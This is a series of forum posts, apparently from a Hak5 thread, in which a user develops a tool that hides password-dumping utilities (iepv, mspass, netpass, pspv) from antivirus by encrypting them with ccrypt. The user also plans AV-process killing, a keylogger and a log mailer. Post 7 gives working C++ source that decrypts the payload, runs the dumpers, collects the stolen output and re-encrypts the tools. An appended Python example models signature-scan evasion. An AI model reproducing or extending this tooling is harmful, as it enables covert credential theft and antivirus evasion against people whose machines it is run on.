hexlax (Active Members, 38 posts)

Everything posted by hexlax

  1. The current snapshot does the following:
     -Encrypted package to thwart AV signatures
     -Determines if AV is running; if it is, executes a clean scanning package. *AV killing is no longer supported, don't ask why, drink bud dry.
     Current package includes:
     ipconfig /all*
     produkey*
     net user*
     psloggedon*
     tracert -h 2*
     net view*
     cports*
     iehv*
     iepv
     mspass
     netcat
     winvnc
     netpass
     pspv
     * denotes programs that will run if AV is found; of course this can all be controlled from the config file.
     ToDo:
     -create U3 image
     -implement keylogger service and log mailer
     Please give me feedback!
  2. Just an update: I implemented the AVkill side of the house. I just need to implement the user interface with all the different command line options. Should be completed shortly. From here, we need to test this beast out. So, feel free to hack the source and distribute the executable, but just give me some feedback on what AVs you've tested them on. I know discretion is too much to ask for regarding this program; however, let's try to keep it out of the AV signatures at least for a little while. The next step is to port for Vista and XP 64. Does anyone have experience with porting code from 32-bit to 64-bit?
  3. You may also want to check out PsExec from Sysinternals. There are many obstacles that one has to overcome when dealing with IP reachback:
     -the node has a publicly routable IP address
     -client software firewalls (whether Windows embedded or 3rd party such as ZoneAlarm)
     -NAT, DMZ, port forwarding, etc.
     Just some ideas. Interesting post though on the key logger. :)
  4. Great! I'll code this up. I'm going to be using this paradigm:
     -ensure admin privs http://support.microsoft.com/kb/q118626/
     -load all processes into an array with pslist
     -check our known AV processes against the array
     -kill the process
  5. Hey, I started a new thread for my package implementing the encryption. Right now I'm working on the AVkill side of the program. Please help me out there, Scorpio, with that AV list you're compiling... http://forums.hak5.org/index.php/topic,8169.0.html
  6. This package has been updated, please scroll down to view the latest development notes... Currently, you can take a look at a snapshot: http://rapidshare.com/files/92198408/scancomp.7z.html or the source: http://rapidshare.com/files/92198966/scanComp-src.7z.html Both of these files require 7-Zip for extracting.
  7. Here is the source using a small payload from the great folks at Nirsoft. Still a lot of work to do to finish the final program, but I'll have more time over the holidays with no work or classes to hack up some code. I may start a new thread for my own payload since this is becoming a beast of its own. This code assumes you have ccrypt in the current executing directory. Although the encrypted files should scan clean for signature-based AVs (please provide feedback), once they are run, AVs will catch the process. Also, you should manually encrypt the payload files first before running this code.

     /*
      * AUTHOR: hexlax
      *
      * The encryption handling of this program is done. Please
      * give me feedback if any AVs catch it.
      *
      * Command line options for final product (not implemented now):
      * a) -q quiet mode, nothing displays to screen
      * b) -f force run anyways
      *    i)   if local admin privs not present
      *    ii)  if AV is detected and forced stop failed
      *    iii) places payload in danger of AV removal
      * c) -c config file path [optional - default presumed]
      *    i)  payload list
      *    ii) utilities list (ccrypt, pskill, etc.)
      * d) -k only attempt to kill AV, no payload run
      *
      * The final product should be scalable enough for a user
      * to add/delete/modify the payload by editing the config file.
      */
     //#include "stdafx.h" //MSVC precompiled header; only needed inside the original Visual Studio project
     #include <iostream>
     #include <string>
     #include <cstdlib>
     using namespace std;

     //global constants
     //NOTE: keep the trailing backslash; the tool names below are appended directly to this path.
     const string PAYLOAD_FILEPATH = "tools\\"; //TODO: insert user pref from config file.
     const string ENC_KEY = "hexlax@hak5";      //TODO: insert user pref from config file.

     //Decrypt every *.cpt file under the payload directory in place (-r recurses, -K takes the key).
     //NOTE: the key is passed on the command line, so it is visible in the process list while ccrypt runs.
     void decrypt()
     {
         cout << "Decrypting payload...\n";
         string syscall = "ccrypt -d -K " + ENC_KEY + " -r " + PAYLOAD_FILEPATH;
         system(syscall.c_str());
     }

     //Encrypt the payload directory back so the tools scan clean on disk again (-q keeps ccrypt quiet).
     void encrypt()
     {
         cout << "Encrypting payload back...\n";
         string syscall = "ccrypt -e -K " + ENC_KEY + " -q -r " + PAYLOAD_FILEPATH;
         system(syscall.c_str());
     }

     //Run each Nirsoft tool with /stext so its output lands in a plain-text temp file.
     void run_payload()
     {
         string syscall;
         cout << "Running Payload:";

         //IEPV.EXE
         cout << ".IEPV..";
         syscall = PAYLOAD_FILEPATH + "iepv /stext iepv.tmp";
         system(syscall.c_str());

         //MSPASS.EXE
         cout << ".MSPASS...";
         syscall = PAYLOAD_FILEPATH + "mspass /stext mspass.tmp";
         system(syscall.c_str());

         //NETPASS.EXE
         cout << ".NETPASS..";
         syscall = PAYLOAD_FILEPATH + "netpass /stext netpass.tmp";
         system(syscall.c_str());

         //PSPV.EXE
         cout << ".PSPV..";
         syscall = PAYLOAD_FILEPATH + "pspv /stext pspv.tmp";
         system(syscall.c_str());

         //END PAYLOAD
         cout << "\n";
     }

     //Consolidate the temp files into log.txt, then delete them.
     void cleanup_temps()
     {
         string syscall;
         cout << "Cleaning up...\n";
         //consolidate our tmp files into one
         //TODO: implement the user's preference here for a
         //file name & program list from config file
         //TODO: after list file is done, use a for statement for cleaner code
         cout << "Saving output to log.txt...\n";
         syscall = "type iepv.tmp >> log.txt";
         system(syscall.c_str());
         syscall = "type mspass.tmp >> log.txt";
         system(syscall.c_str());
         syscall = "type netpass.tmp >> log.txt";
         system(syscall.c_str());
         syscall = "type pspv.tmp >> log.txt";
         system(syscall.c_str());

         //get rid of *.tmp files
         cout << "Removing temp files...\n";
         syscall = "del *.tmp";
         system(syscall.c_str());
     }

     int main()
     {
         decrypt();
         run_payload();
         encrypt();
         cleanup_temps();
         cout << "Scan Complete!\n";
         return 0;
     }
  8. True; however, it may be as simple as searching for default installation directories such as "C:\Program Files" or even the registry. Side bar: Has anyone tried to end AV processes by using taskkill /t (which kills child processes as well)? Currently not running any AV on my VM for packing reasons for this app...
  9. Yeah man, as soon as my code is complete and cleaned I'll post it up. Probably not till the weekend though... I'm really interested in that AV list you're compiling. That would help me out greatly!
  10. I've been reading this thread continuously hoping for a solution. It wasn't until I finally took some initiative that I may have figured out a solution. I tested this on XP SP2 running Symantec AV with definition files current as of 12/14/2007. On a different box, I used ccrypt to encrypt the files. This renames the files to <program>.exe.cpt. This successfully passed Symantec's scans. I'm hacking some C++ now which will follow this paradigm:
      -Scan computer for known AV
      -If AV present, try to kill the process
      -If kill successful, decrypt payload
      -Run payload & encrypt files back
      Let me know what you think. Once I have some time to get a VM up and running, I'll test ccrypt with other AVs. As far as I know though, this should work against all signature-based ones...
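The following is an added illustration of the claim in posts 7 and 10 above (that ccrypt-wrapped tools scan clean on disk but are caught once they are decrypted to run). It is not hexlax's code and is not part of the thread. Assumptions: ccrypt's Rijndael is replaced by a stand-in stream cipher built from SHA-256 in counter mode, the "payload" is the EICAR test string plus constructed filler rather than a Nirsoft binary, the signature database holds only EICAR, and the 7.0 bits/byte entropy threshold is a typical heuristic value chosen here, not something the thread mentions. The entropy check is included to show why "passed Symantec" on one date does not generalize: a scanner that does not recognise the ciphertext can still flag the container for looking encrypted.

```python
"""Signature scan vs. an encrypted-on-disk payload (added example, not from the thread)."""
import hashlib
import math

# Constructed inputs (not real tool binaries or real AV signatures).
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
PAYLOAD = EICAR + b"\x00" * 4096          # stand-in for a tool .exe
KEY = b"hexlax@hak5"                       # the key used in the thread's source
SIGNATURES = {"EICAR-Test-File": EICAR}   # one-entry signature database

ENTROPY_THRESHOLD = 7.0   # bits/byte; assumed heuristic cut-off for packed/encrypted files


def keystream(key: bytes, length: int) -> bytes:
    """SHA-256 in counter mode: a deterministic pseudorandom keystream (stand-in for ccrypt)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor_crypt(key: bytes, data: bytes) -> bytes:
    """Symmetric stand-in for `ccrypt -e` / `ccrypt -d`: the same call both encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input, 8.0 for uniformly random bytes)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def signature_scan(data: bytes) -> list:
    """Names of every signature whose byte pattern occurs in data."""
    return [name for name, pattern in SIGNATURES.items() if pattern in data]


def verdict(data: bytes) -> str:
    """What a file scanner would say about these bytes as they sit on disk.

    A signature match is reported by name; otherwise the entropy heuristic can
    only say the file looks encrypted or packed, which is why it is weaker.
    """
    hits = signature_scan(data)
    if hits:
        return "signature:" + ",".join(hits)
    if shannon_entropy(data) > ENTROPY_THRESHOLD:
        return "suspicious-entropy"
    return "clean"


def scan_lifecycle(key: bytes = KEY, payload: bytes = PAYLOAD) -> dict:
    """Verdict at each stage of the thread's decrypt -> run -> re-encrypt cycle."""
    encrypted = xor_crypt(key, payload)    # what ships on the U3 stick as <program>.exe.cpt
    decrypted = xor_crypt(key, encrypted)  # what the loader writes back before running it
    return {
        "plain_on_disk": verdict(payload),
        "encrypted_on_disk": verdict(encrypted),
        "decrypted_to_run": verdict(decrypted),
        "roundtrip_ok": str(decrypted == payload),
    }


if __name__ == "__main__":
    for stage, result in scan_lifecycle().items():
        print(f"{stage:20s} {result}")
```

The encrypted stage carries no signature hit, which is the behaviour post 10 observed, but the same file trips the entropy heuristic, and the decrypted stage is caught exactly as post 7 warns: the loader has to put the plaintext tool back on disk (or in memory) to run it, and that is where on-access scanning sees it.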